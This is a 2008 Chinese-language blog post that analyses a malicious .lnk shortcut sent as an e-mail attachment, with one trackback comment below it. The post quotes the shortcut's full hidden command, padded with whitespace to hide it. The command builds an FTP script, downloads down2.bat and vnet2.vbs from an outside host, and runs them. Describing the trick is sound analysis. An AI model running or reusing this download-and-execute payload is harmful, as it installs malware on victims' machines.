2008年12月12日 星期五

病毒:我設計的你看看

今天收到一個用 E-mail 寄來的病毒,標題如上。(那是信件標題,病毒不是我設計的!)

裡面附了一個檔案,是 .lnk 的捷徑檔,原本以為是打開後會連到惡意網站,結果仔細一看內容如下。
捷徑後面故意附了一長串空白,讓使用者用「內容」去看的時候,會看到空無一物。
可是我連上去,惡意程式無法下載,可能是伺服器負荷過大?
這種方式我倒是第一次看到,(可能是我孤陋寡聞),算是蠻有創意的一個病毒,是不是該稱讚一下?

"%windir%\system32\cmd.exe /c echo open lin31003100.3322.org > t.t&echo 123>>t.t&echo 123>>t.t&echo get down2.bat c:\down2.bat >> t.t&echo get vnet2.vbs %windir%\vnet2.vbs >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&start %windir%\vnet2.vbs&                    "

1 則留言:

  1. [...] 對於此木馬的描述,請看前文「病毒:我設計的你看看」。 [...]

    回覆刪除